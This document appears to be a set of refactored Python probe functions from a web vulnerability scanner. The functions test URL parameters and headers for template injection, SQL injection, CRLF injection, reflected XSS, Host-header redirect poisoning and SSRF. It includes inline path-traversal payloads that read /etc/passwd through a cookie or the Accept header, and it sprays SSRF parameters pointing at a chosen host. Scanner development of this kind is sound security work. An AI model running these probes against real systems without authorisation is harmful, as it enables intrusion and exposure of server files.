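 def Get(url):
     """Probe each GET parameter of *url* for server-side template injection.

     Runs only when ``methods.Get(url) == 1``. For every ``key=value`` chunk of
     the query string and every ``payload -> message`` pair in
     ``ssti_payloads`` it fetches a baseline, then the same URL with the payload
     appended to the chunk (through ``en``), and reports a finding when the
     injected response contains more regex matches of ``message`` than the
     baseline. This is a count-based heuristic: pages whose content changes
     between two requests can produce false positives.

     Returns the finding dict on the first hit, ``None`` otherwise (also when the
     HTTP helper signals failure by returning 0, which stops the payloads for
     the current parameter).

     The original wrapped the loop in a dead ``if 1 == 1:`` guard; it is gone.
     """
     if methods.Get(url) != 1:
         return None
     target = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             baseline = nq.Get(url)
             if baseline == 0:
                 break
             pattern = message.encode('utf-8')
             baseline_hits = len(findall(pattern, baseline.content))
             # str.replace substitutes every occurrence of the chunk in the URL,
             # not only the query entry.
             link = url.replace(param, param + en(payload))
             probe = nq.Get(link)
             if probe == 0:
                 break
             if baseline_hits < len(findall(pattern, probe.content)):
                 bug = {
                     'name': 'template injection',
                     'payload': payload,
                     'method': 'GET',
                     'parameter': param,
                     'link': link,
                     'target': target
                 }
                 show.bug(bug='template injection',
                          payload=payload,
                          method='GET',
                          parameter=param,
                          link=link)
                 return bug
     return None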
 def Get(url):
     """Probe each GET parameter of *url* for error-based SQL injection.

     For every ``key=value`` chunk of the query string and every entry of
     ``sqli_payloads`` a baseline request is fetched and stored through
     ``save_request``, then the payload is appended to the chunk and the URL
     re-fetched. A finding is reported when, for any pattern in ``sql_err``,
     the injected response has more regex matches than the stored baseline.

     Returns the finding dict on the first hit, ``None`` otherwise. A failed
     request (the HTTP helper returns 0) stops the payloads for the current
     parameter.

     NOTE(review): the request is sent with the raw ``payload`` while the
     reported ``link`` is built with ``en(payload)`` — confirm which form the
     caller expects, since the two can differ.
     """
     target = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             baseline = nq.Get(url)
             if baseline == 0:
                 break
             save_request.save(baseline)
             probe = nq.Get(url.replace(param, param + payload))
             if probe == 0:
                 break
             for err in sql_err.values():
                 pattern = err.encode('utf-8')
                 baseline_hits = findall(pattern, save_request.get().content)
                 probe_hits = findall(pattern, probe.content)
                 if len(baseline_hits) >= len(probe_hits):
                     continue
                 link = url.replace(param, param + en(payload))
                 bug = {
                     'name': 'SQL injection',
                     'payload': payload,
                     'method': 'GET',
                     'parameter': param,
                     'link': link,
                     'target': target
                 }
                 show.bug(bug='SQL injection',
                          payload=payload,
                          method='GET',
                          parameter=param,
                          target=target,
                          link=link)
                 return bug
     return None
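 def Get(url):
     """Probe each header in ``SCAN_Headers`` for error-based SQL injection.

     For every header name and every entry of ``sqli_payloads`` a baseline
     GET to *url* is fetched and stored through ``save_request``; the payload
     is then appended to the header's currently configured value (or sent
     alone when none is configured) and the request repeated with ``REQ``
     against the URL without its query string. A finding is reported via
     ``show.bug_Header`` when any ``sql_err`` pattern matches more often in
     the injected response than in the baseline; only the first matching
     pattern is reported per payload. Nothing is returned.

     Changes from the original: the bare ``except`` around the header lookup
     is now ``except Exception`` (it no longer swallows KeyboardInterrupt), the
     header copy is a comprehension, and the loop no longer reuses ``H`` for
     two different things.
     """
     d = nq.Dump()
     for header in SCAN_Headers:
         for payload in sqli_payloads:
             r = nq.Get(url)
             if r == 0:
                 break
             save_request.save(r)
             # Append to the configured header value when there is one; a
             # missing or non-dict headers entry falls back to the bare payload.
             try:
                 injected = f"{nq.Dump()['headers'][header]}{payload}"
             except Exception:
                 injected = payload
             # Copy every other configured header and override the one under test.
             all_headers = {h: v for h, v in d['headers'].items() if h != header}
             all_headers[header] = injected
             req = REQ(url.split('?')[0], method='GET', headers=all_headers)
             if req == 0:
                 break
             for e in sql_err.values():
                 pattern = e.encode('utf-8')
                 baseline_hits = findall(pattern, save_request.get().content)
                 probe_hits = findall(pattern, req.content)
                 if len(baseline_hits) < len(probe_hits):
                     show.bug_Header(bug='SQL injection',
                                     payload=payload,
                                     method='GET',
                                     header=header,
                                     target=url)
                     break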
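 def Get(url):
     """Probe each header in ``SCAN_Headers`` for server-side template injection.

     For every header name and every ``payload -> message`` pair in
     ``ssti_payloads`` a baseline GET to *url* is fetched and the number of
     regex matches of ``message`` in its body counted; the payload is then
     appended to the header's configured value (or sent alone when none is
     configured) and the request repeated with ``REQ`` against the URL without
     its query string. ``show.bug_Header`` is called when the injected response
     has more matches than the baseline, after which the remaining payloads
     for that header are skipped. Nothing is returned.

     Changes from the original: the bare ``except`` is now ``except Exception``
     (KeyboardInterrupt is no longer swallowed), the header copy is a
     comprehension, and ``H`` is no longer reused for two different values.
     """
     d = nq.Dump()
     for header in SCAN_Headers:
         for payload, message in ssti_payloads.items():
             r = nq.Get(url)
             if r == 0:
                 break
             pattern = message.encode('utf-8')
             baseline_hits = len(findall(pattern, r.content))
             # Append to the configured header value when there is one; a
             # missing or non-dict headers entry falls back to the bare payload.
             try:
                 injected = f"{nq.Dump()['headers'][header]}{payload}"
             except Exception:
                 injected = payload
             # Copy every other configured header and override the one under test.
             all_headers = {h: v for h, v in d['headers'].items() if h != header}
             all_headers[header] = injected
             req = REQ(url.split('?')[0], headers=all_headers)
             if req == 0:
                 break
             if baseline_hits < len(findall(pattern, req.content)):
                 show.bug_Header(bug='template injection',
                                 payload=payload,
                                 method='GET',
                                 header=header,
                                 target=url)
                 break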
 def Get(url):
     """Probe each GET parameter of *url* for CRLF injection; return the first finding.

     Every ``key=value`` chunk of the query string gets each entry of
     ``crlf_payloads`` appended (through ``en``); a hit is any response that
     carries a ``Header-Test`` header, which is what the payloads try to
     inject. The payload is reported with CR/LF percent-encoded so the finding
     stays on one line. Returns the finding dict, or ``None`` when nothing is
     found; a failed request (helper returns 0) stops the payloads for the
     current parameter.
     """
     target = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in crlf_payloads:
             link = url.replace(param, param + en(payload))
             r = nq.Get(link)
             if r == 0:
                 break
             if not r.headers.get('Header-Test'):
                 continue
             shown = payload.replace('\n', '%0a').replace('\r', '%0d')
             bug = {
                 'name': 'CRLF injection',
                 'payload': shown,
                 'method': 'GET',
                 'parameter': param,
                 'link': link,
                 'target': target
             }
             show.bug(
                 bug='CRLF injection',
                 payload=shown,
                 method='GET',
                 parameter=param,
                 link=link
             )
             return bug
     return None
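 def Get(url):
     """Probe each GET parameter of *url* for reflected XSS; return the first finding.

     Runs only when ``methods.Get(url)`` is 1 and ``refxss.Get(url)`` is 1
     (the reflection pre-check is skipped entirely when the method check
     fails). For every ``key=value`` chunk and every entry of ``xss_payloads``
     the payload is appended through ``en``; a hit is a response whose raw body
     contains the payload bytes verbatim — no context check, so an HTML-escaped
     echo does not match but a reflection inside a script string does.

     Returns the finding dict on the first hit (note: this dict carries no
     ``target`` key, unlike the other probes), ``None`` otherwise.

     Fix: the dict's ``name`` was misspelled ``'Corss-site scripting'`` while
     the printed name was spelled correctly; both now agree.
     """
     mt = methods.Get(url)
     if mt == 1 and refxss.Get(url) == 1:
         for param in url.split("?")[1].split("&"):
             for payload in xss_payloads:
                 link = url.replace(param, param + en(payload))
                 req = nq.Get(link)
                 if req == 0:
                     continue
                 if payload.encode('utf-8') in req.content:
                     bug = {
                         'name': 'Cross-site scripting',
                         'payload': payload,
                         'method': 'GET',
                         'parameter': param,
                         'link': link
                     }
                     show.bug(bug='Cross-site scripting',
                              payload=payload,
                              method='GET',
                              parameter=param,
                              link=link)
                     return bug
     return None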
 def Get(url):
     """Probe each GET parameter of *url* for server-side template injection.

     For every ``key=value`` chunk of the query string and every
     ``payload -> message`` pair in ``ssti_payloads`` a baseline is fetched,
     the payload is appended to the chunk (through ``en``) and the URL
     re-fetched; ``show.bug`` is called when the injected response has more
     regex matches of ``message`` than the baseline, after which the remaining
     payloads for that parameter are skipped. A failed request (helper returns
     0) also stops the current parameter. Nothing is returned.
     """
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             baseline = nq.Get(url)
             if baseline == 0:
                 break
             pattern = message.encode('utf-8')
             baseline_hits = len(findall(pattern, baseline.content))
             link = url.replace(param, param + en(payload))
             probe = nq.Get(link)
             if probe == 0:
                 break
             if baseline_hits >= len(findall(pattern, probe.content)):
                 continue
             show.bug(bug='template injection',
                      payload=payload,
                      method='GET',
                      parameter=param,
                      link=link)
             break
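 def Get(url):
     """Return 1 when a GET to *url* is answered with anything but 405, else 0.

     Presumably the ``methods.Get`` gate the parameter probes call before
     testing — confirm against the callers. The HTTP helper signals failure by
     returning 0, which has no ``status_code``; that case and any exception
     raised while fetching map to 0. ``except Exception`` replaces the bare
     ``except`` so Ctrl-C is no longer swallowed.
     """
     try:
         r = nq.Get(url)
         if r == 0:
             return 0
         return 1 if r.status_code != 405 else 0
     except Exception:
         return 0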
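def run(options):
    """Check each URL in ``options['url']`` for a file read through the ``usid`` cookie.

    The module-level ``cookie`` dict is mutated in place (``usid`` is set to a
    traversal value) and pushed to the HTTP helper with ``nq.Update`` before
    every request, so the value persists for later requests made through
    ``nq``. A hit is a response body that contains ``/usr/sbin/nologin`` after
    decoding. Nothing is returned.

    Fix: a leftover debug ``print('hi')`` that fired after every URL is removed.
    """
    for url in options['url']:
        cookie['usid'] = '../../../../../../../../../../../../../etc/passwd'
        nq.Update(cookie=cookie)
        r = nq.Get(url)
        if r != 0 and '/usr/sbin/nologin' in r.content.decode():
            print("[+] Read /etc/passwd :)")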
def httper(url):
    """Try *url* over http and https and print the final URL of each that answers.

    *url* is first normalised with ``parser``; both schemes are attempted in
    order and a helper result of 0 (failure) is skipped. Any exception is
    printed and ends the function — no URL is returned.
    """
    try:
        bare = parser(url)
        for candidate in (f'http://{bare}', f'https://{bare}'):
            resp = nq.Get(candidate)
            if resp == 0:
                continue
            print(resp.url)
    except Exception as e:
        print(e)
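 def Get(url):
     """Return 1 when a marker appended to every query parameter is echoed in the body, else 0.

     Each ``key=value`` chunk of the query string gets the literal
     ``scantrrr`` appended (all chunks in one request), the page is fetched and
     the decoded body searched case-insensitively. Any failure — no ``?`` in
     *url*, a helper result of 0, an undecodable body — yields 0.
     ``except Exception`` replaces the bare ``except`` so Ctrl-C propagates.
     """
     try:
         for param in url.split('?')[1].split('&'):
             url = url.replace(param, f'{param}scantrrr')
         r = nq.Get(url)
         if r == 0:
             return 0
         return 1 if 'scantrrr' in r.content.decode().lower() else 0
     except Exception:
         return 0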
 def Get(url):
     """Probe each GET parameter of *url* for reflected XSS; report the first hit per parameter.

     For every ``key=value`` chunk of the query string and every entry of
     ``xss_payloads`` the payload is appended through ``en`` and the URL
     fetched; a hit is a raw body that contains the payload bytes verbatim
     (no context or encoding check). ``show.bug`` is called once per
     parameter at most; failed requests (helper returns 0) are skipped.
     Nothing is returned.
     """
     for param in url.split("?")[1].split("&"):
         for payload in xss_payloads:
             link = url.replace(param, param + en(payload))
             req = nq.Get(link)
             if req == 0:
                 continue
             if payload.encode('utf-8') not in req.content:
                 continue
             show.bug(bug='Cross-site scripting',
                      payload=payload,
                      method='GET',
                      parameter=param,
                      link=link)
             break
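 def Get(url):
     """Return 1 when a marker appended to every query parameter shows up in a response header, else 0.

     Each ``key=value`` chunk gets the literal ``scantrrr`` appended (all in one
     request); the response headers are then searched for the marker in either
     a header name or value — a signal that query input reaches the response
     headers. Any failure (no ``?`` in *url*, helper returns 0, exception)
     yields 0. ``except Exception`` replaces the bare ``except`` so Ctrl-C
     propagates, and the confusing ``for``/``else`` is replaced by ``any``.
     """
     try:
         for param in url.split('?')[1].split('&'):
             url = url.replace(param, f'{param}scantrrr')
         r = nq.Get(url)
         if r == 0:
             return 0
         reflected = any('scantrrr' in header or 'scantrrr' in value
                         for header, value in r.headers.items())
         return 1 if reflected else 0
     except Exception:
         return 0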
def GO(url,host):
    """Send batches of SSRF-style probe parameters whose values point at *host*.

    Builds a query string in which ``r`` and every name in ``ssrf_parameters``
    carry a URL-encoded ``{host}/<name>`` value, and sends it as a GET and as a
    POST body (to *url* without its query) whenever the accumulated string is
    longer than three times the number of parameters. The responses are not
    inspected here and nothing is returned.
    """
    d = "?r="+urlencoder(f'{host}/r')
#    print(d)
    l = len(ssrf_parameters)
    for par in ssrf_parameters:
        pay = urlencoder(f'{host}/{par}')
        d += f'&{par}={pay}'
#        print(d)
        # Flush threshold is a length heuristic, not a parameter count.
        # NOTE(review): the first batch starts from the bare "?r=" prefix
        # (no scheme/host) while later batches are reset to url's path, and
        # the reset value is not passed through urlencoder — confirm intent.
        if len(d) > l*3:
            nq.Get(d)
            nq.Post(url.split('?')[0],urlparse(d).query)
            d = f"{url.split('?')[0]}?r={host}/r"
 def Get(url):
     """Probe each GET parameter of *url* for CRLF injection and report every hit.

     Every ``key=value`` chunk of the query string gets each entry of
     ``crlf_payloads`` appended (through ``en``); a hit is a response whose
     ``Header-Test`` header equals ``BLATRUC``, the value the payloads try to
     inject. Unlike the dict-returning variant, this one keeps going after a
     hit and reports each matching payload; a failed request (helper returns
     0) stops the payloads for the current parameter. Nothing is returned.
     """
     for param in url.split('?')[1].split('&'):
         for payload in crlf_payloads:
             link = url.replace(param, param + en(payload))
             r = nq.Get(link)
             if r == 0:
                 break
             if r.headers.get('Header-Test') != 'BLATRUC':
                 continue
             shown = payload.replace('\n', '%0a').replace('\r', '%0d')
             show.bug(bug='CRLF injection',
                      payload=shown,
                      method='GET',
                      parameter=param,
                      link=link)
0
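def scan(host):
    """Send a traversal value in the ``Accept`` header to *host* and report a file-read signal.

    For each ``payload -> msg`` pair the header is pushed to the HTTP helper
    with ``nq.Update`` (so it persists for later requests through ``nq``),
    *host* is fetched, and a line is printed when ``msg`` appears in the raw
    body. Nothing is returned.

    Fix: two nested ``try: ... finally: pass`` wrappers that caught nothing
    and only obscured the control flow are removed; behaviour is unchanged.
    """
    payloads = {
            '../../../../../../../../../../etc/passwd{{':'root:'
    }
    for payload, msg in payloads.items():
        nq.Update(header={'Accept': payload})
        r = nq.Get(host)
        if r != 0 and msg.encode() in r.content:
            print(f'[+] Found :> {host}')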
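def GO(host):
    """Check each path in ``paths`` under *host* and print a line for every match.

    ``paths`` maps a path to the expected signal: something ``int()`` accepts
    (compared numerically with the response status code) or a string that must
    appear in the UTF-8 decoded body. A helper result of 0 is skipped and any
    other failure for a path (undecodable body, network error) is ignored so
    the remaining paths are still checked. Nothing is returned.

    Fixes: the original compared the un-converted ``msg`` with the int status
    code, so a numeric *string* never matched — the converted value is used
    now; the two bare ``except`` clauses are ``except Exception`` so Ctrl-C
    propagates; and the per-iteration reset of ``host`` via ``finally`` is
    replaced by a local ``target``.
    """
    for path, msg in paths.items():
        target = urljoin(host, path)
        try:
            r = nq.Get(target)
            if r == 0:
                continue
            try:
                expected_status = int(msg)
            except (TypeError, ValueError):
                # Not numeric: substring match against the decoded body.
                if msg in r.content.decode('utf-8'):
                    print(f'{good} Found :> {target}')
            else:
                if expected_status == r.status_code:
                    print(f'{good} Found :> {target}')
        except Exception:
            pass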
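def reflect(link):
    """Report query parameters of *link* whose value is echoed verbatim in the body.

    For each ``key=value`` chunk a marker of the form ``><sca<N>nt3r`` (N is a
    random 1–20) is appended and the page re-fetched; the chunk is reported
    when the marker appears in the UTF-8 decoded body. A helper result of 0 is
    skipped; any exception (no ``?`` in *link*, undecodable body, network
    error) ends the function silently so one bad link does not stop a batch.
    Nothing is returned.

    Fixes: bare ``except`` is now ``except Exception`` (Ctrl-C propagates), the
    no-op ``finally: pass`` is dropped, and the output said "Relfected".
    """
    try:
        for parameter in link.split('?')[1].split('&'):
            marker = f'><sca{randint(1,20)}nt3r'
            newlink = link.replace(parameter, parameter + marker)
            r = nq.Get(newlink)
            if r == 0:
                continue
            if marker in r.content.decode('utf-8'):
                print(f'''
{good} Reflected > {newlink} 
{info} Parameter > {parameter}
{info} Text > {marker}
''')
    except Exception:
        pass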
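def scan(host):
    """Append template expressions to *host*'s path and report the first one that is evaluated.

    Each ``payload -> msg`` pair is joined onto *host* with ``urljoin``; a hit
    is a raw body containing ``msg`` (the expected evaluated result), after
    which the remaining payloads are skipped. A helper result of 0 is skipped.
    Nothing is returned.

    Fix: the surrounding ``try: ... finally: pass`` caught nothing and is
    removed; behaviour is unchanged.
    """
    payloads = {
        'scan{{6*6}}t3r': 'scan36t3r',
        'scan${6*6}t3r': 'scan36t3r',
        'scan<% 6*6 %>t3r': 'scan36t3r'
    }
    for payload, msg in payloads.items():
        new_host = urljoin(host, f'{payload}')
        r = nq.Get(new_host)
        if r == 0:
            continue
        if msg.encode('utf-8') in r.content:
            print(f'''
[+] Found :> {new_host}
                ''')
            break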
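def GO(url, host):
    """Send batches of SSRF-style probe parameters whose values point at *host*.

    Starting from *url*, every name in ``ssrf_parameters`` is appended as
    ``<name>={host}/<name>``; once the query holds
    ``parameters_in_one_request`` extra ``=``-separated pieces the batch is
    sent as a GET and as a POST body (to *url* without its query) and the
    accumulator is reset to *url*. Responses are not inspected and nothing is
    returned.

    Fixes: the ``if newurl != url`` / ``else`` branches were identical (the
    separator only depends on whether the accumulator already has a query),
    so they are merged; the unused ``l`` is dropped.
    """
    newurl = url
    for par in ssrf_parameters:
        pay = f'{host}/{par}'
        separator = '&' if len(urlparse(newurl).query) > 0 else '?'
        newurl += f'{separator}{par}={pay}'
        # Batch size is measured by splitting the query on '=', so the
        # threshold counts one more piece than there are parameters.
        if len(urlparse(newurl).query.split(
                '=')) == parameters_in_one_request + 1:
            nq.Get(newurl)
            nq.Post(url.split('?')[0], post_data(urlparse(newurl).query))
            newurl = url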
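def scan(host):
    """Check whether a spoofed ``Host`` header is copied into a redirect target.

    The header is pushed to the HTTP helper with ``nq.Update`` (it persists for
    later requests through ``nq``), *host* is fetched, and a hit is a
    ``Location`` response header whose netloc contains the spoofed host name.
    Only the first hit is printed. Nothing is returned.

    Fixes: the no-op ``try: ... finally: pass`` wrappers are removed, the loop
    now actually uses its ``payload``/``msg`` values instead of repeating the
    literal, and ``r`` is no longer reused for the parsed netloc.
    """
    payloads = {'scant3r.org': 'scant3r.org'}
    for payload, msg in payloads.items():
        nq.Update(header={'Host': payload})
        r = nq.Get(host)
        if r == 0:
            continue
        loc = r.headers.get('Location')
        if loc and msg in urlparse(loc).netloc:
            print(f'''[+] Found :> {host}''')
            break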
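def inject(host):
    """Probe every GET parameter of *host* for CRLF injection over GET, POST and PUT.

    For each ``key=value`` chunk of the query string and each entry of
    ``payloads`` the payload is appended to the chunk; for GET the modified URL
    is fetched, for POST/PUT the modified query becomes the request body (via
    ``post_data``) sent to *host* without its query. A hit is a response
    carrying a ``Header-Test: BLATRUC`` header, the marker the payloads try to
    inject; after the first hit for a parameter its remaining payloads are
    skipped. Results are printed, nothing is returned.

    The original repeated the same loop three times with a ``done`` flag; the
    marker check is now one helper and the body-based methods share a loop.
    """
    params = host.split('?')[1].split('&')
    base = host.split('?')[0]

    def _marker_present(r):
        # The HTTP helpers return 0 on failure; only a real response has headers.
        if r == 0:
            return False
        return any(header == 'Header-Test' and value == 'BLATRUC'
                   for header, value in r.headers.items())

    for param in params:
        for payload in payloads:
            link = host.replace(param, param + payload)
            if _marker_present(nq.Get(link)):
                print(f'[{green}CRLF{rest}] Found :> {link}')
                break

    for method_name, sender in (('POST', nq.Post), ('PUT', nq.Put)):
        for param in params:
            for payload in payloads:
                data = urlparse(host.replace(param, param + payload)).query
                if _marker_present(sender(base, post_data(data))):
                    print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> {method_name}\n{info} Data :> {data}')
                    break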
def GO(url, host):
    """Send one SSRF-style probe per name in ``ssrf_parameters`` over GET, POST and PUT.

    Each probe sets ``<name>={host}/<name>``: as a query on *url*'s path for
    GET, and as a ``post_data`` body for POST and PUT. Responses are not
    inspected and nothing is returned.
    """
    base = url.split('?')[0]
    for par in ssrf_parameters:
        probe_value = f'{host}/{par}'
        nq.Get(f"{base}/?{par}={probe_value}")
        nq.Post(base, post_data(f'{par}={probe_value}'))
        nq.Put(base, post_data(f'{par}={probe_value}'))